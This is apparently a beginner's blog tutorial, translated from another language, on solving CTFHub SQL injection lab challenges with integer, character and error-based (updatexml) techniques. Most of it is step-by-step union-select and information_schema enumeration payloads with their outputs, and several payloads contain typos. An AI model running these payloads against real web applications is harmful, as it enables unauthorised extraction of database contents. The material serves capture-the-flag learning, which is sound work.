If you are a novice like me at the beginning and want to get started with SQL injection, then you must first understand the basic SQL injection language. This is prerequisite knowledge, and I will introduce you to the topic in ctfhub later. And analysis. If there is any misunderstanding, or if you have a better understanding, please feel free to give feedback in the comment area. Thank you! ! !
table of Contents
Prerequisite knowledge
I will present the prerequisite knowledge in the form of a table. Please read it carefully.
| Statement | meaning |
|---|---|
| union select | Joint query, joint injection |
| database() | Echo the current database |
| version() | View the current version of SQL such as: mysql 1.2.3 |
| group_concat() | Connect the generated values in the same group with a certain symbol, such as concat(" "), then different groups are connected with " " |
| information_schema | A database that stores a lot of information |
| information_schema.scemata | All database information |
| information_schema.tables | Represents all tables stored in the database |
| table_name | Table name |
| information_schema.columns | Represents all columns in the table |
| column_name | Names listed in the table |
| right(str,num) | Indicates that the string intercepts num characters from the right (str is the meaning of a string) |
| left(str,num) | The direction is opposite to the above, the effect is the same |
| substr(str,N,M) | Represents a string, starting from N characters, intercepting M characters |
The injection process is like looking for the library first, then the table in the library, then looking for the column in the table, and finally entering the column to get the data. (Personal understanding, if there is an error, please point it out immediately)
sql injection integer injection
1. Judging whether there is injection-for integer injection
1. Input: 1'(1+single quote)
result: an error occurred in the program
2. Input: 1 and 1=1
result: the program returns to normal, the same as the page where you just entered 1
3. Input: 1 and 1=2
result : The program has an error.
If the above three points are met, it means that the URL has integer injection
2. The number of query fields (here from big to small)
1. Input: 1 order by 2
result: the same page as id=1
2. Input: 1 order by 3
result: program error
3. The number of result fields is 2 digits
3. Query the position where the SQL statement can be inserted
1. Input: -1 union select 1,2
Result: Display Data: 2 (SQL statement can be injected in 2)
Note: "-1" is a number that does not exist in the database, which can ensure that the previous data cannot be found , Use union select 1, 2 (joint query) to query id=1 and 2 to see which id can be inserted into the SQL statement
4. Get the database name of the current database
1. Input: -1 union select 1,database()
Result: data: sqli indicates that the name of the database in 2 is "sqli"
Note: Change the location of 2 to database() to query the name of the database in 2
5. Get the table name in the database
Method one (get one of the table names at a time)
1. Input: -1 union select 1,(select table_name from information_schema where table_schema='sqli' limit 0,1)
Result: Data: news
2. Input: -1 union select 1,(select table_name from information_schema where table_schema='sqli' limit 1,1)
Result: Data: flag
Note: Just set the "limit 0,1" One number can be changed by one table, one table query
Method two (get the table names in all databases at once)
1. Input: -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
Result: Data: news, flag
6. Obtaining the field name (equivalent to viewing the file in the "flag" table)
Method one (obtaining one field at a time)
1. Input: -1 union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1)
Result: Data: flag
Note: The next step of the query is the same as the fifth step method one
method Two (get all fragments at once)
1. Input: -1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
Result: Data: flag
Seven. Get data (get the data named'flag' in the table)
Method 1 (get one piece of data at a time)
1. Input: the -1 union select 1,(select flag from sqli.flag limit 0,1)
result: it is the flag.
Note: The operation of querying the next piece of data is the same as the above method 1 and
2 (Get all the data in the flag at one time)
1. Input: -1 union select 1,group_concat(flag) from sqli.flag
Result: it is the flag
Character injection of SQL injection
Before you do the question, you have to understand: In the character injection, you must pay attention to the problem of string closure. So you need to add a single quotation mark '-' after the 1 is a comment. Two minus signs plus spaces, spaces must not be thrown.
1. Determine whether there is injection
1. Input: 1'
result: program error
2. Input: 1' and 1=1 -- '
result: Data: ctfhub
3. Input: 1' and 1=2 -- '
result: program error
If the above three points are met, it can be judged that the URL is a character injection.
2. Determine the number of columns in the select statement
1. Input: 1' order by 3 -- '
Result: Error
2. Input: 1' order by 2 -- '
Result: Correct
Note: So the select statement has 2 columns
3. Find the column that can be inserted into the SQL statement
1. Input: $name=' union select 1,2 -- '
Result: Data: 2
Note: SQL statement can be inserted into the second column, $name= is equivalent to integer type -1 to ensure that the previous number is not displayed
4. Use functions to collect database information (user, database name, version...)
1. Input: $name=' union select 1,user() -- '
Result: Data: root@localhost
Note: Because it is the root user, you can access the information_schema database
2. Input: $name=' union select 1,database() -- '
Result: Data: sqli
note : The name of the current database is sqli
Function library:
User: user()
Current function library: database()
Database version: version()
@@hostname: (user)
@@datadir: the location of the database in the file
@@version: version
5. Query the database through union
1. Input: $name=' union select 1,group_concat(schema_name) from information_schema.schemata -- '
Result: Data: information_schema, mysql, performance_schema, sqli
Note: Get the names of all databases
2. Input: $name=' union select table_schema,count(*) from informationn_schema.tables -- '
Result: Data: 161
Note: How many tables are in the query table
3. Input: $name=' union select table_schema,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- '
Result: Data: new, flag
comment: view the table name in the sqli database (personally think the above two steps can be skipped)
4. Input: $name=' union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) -- '
result: Data: flag
comment: query how many flag column fields, and the method is Query in turn, the second query only needs to change limit 0,1 to limit 1,1
5. Query the contents of the columns in the specified database table
1. Input: $name=' union select 1,database() -- '
Result: flag answer
Error injection of sql injection
The difference from the previous integer and character types is that when you enter 1 you will know that this is an error injection, so the format of its injection statement is different. We need to use the updatexml() function. First of all, I will Introduce the updatexml function
UPDATEXML (XML_document, XPath_string, new_value); — Simply put, it is updatexml (document object, concat(0x7e, query statement, 0x7e)); the
first parameter: XML_document is in String format, which is an XML document object name.
The second parameter: XPath_string (a string in Xpath format).
The third parameter: new_value, String format, replace the found data that meets the conditions
Since the second parameter of updatexml requires a string in Xpath format, the content starting with is not the syntax of xml format, so 0x7e is used here instead of " ". The concat() function is a string concatenation function which obviously does not conform to the rules, but it will The execution result in the brackets is reported as an error, so that error injection can be realized.
1. Judgment
1. Input: 1
Result: Query is correct
2. Input: 1'
Result: Query error
2. Use updatexml function to report error injection
1. Input: 1 union select updatexml(1,concat(0x7e,database(),0x7e),1);
Result: Get the database name.
Note: Why is 1 here? ?
Three. Enter the database to view that
1. Input: 1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli"),0x7e),1);
Result: new, flag appears
Four. View the columns in the flag table
1. Input: 1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema="sqli" and table_name="flag"),0x7e),1);
Result: Flag appears
5. View the flag
1. Input: 1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1);
Result: Only part of the flag answer appears.
Note: This is the echo question, so we need to use the right or left function
6. Use the right function to fully echo the flag
1. Input: 1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag),50),0x7e),1);
Result: flag answer
Note: To master the usage of the right function, you need to be flexible, I believe you can.
Starting from scratch requires more patience and constant experimentation. Believe it or not, the blogger has worked on the first question for 3 to 4 hours, but slowly gains a sense of direction and feeling afterwards, and the time it takes for the next two questions Every time is shorter than every time, I believe you can also drop.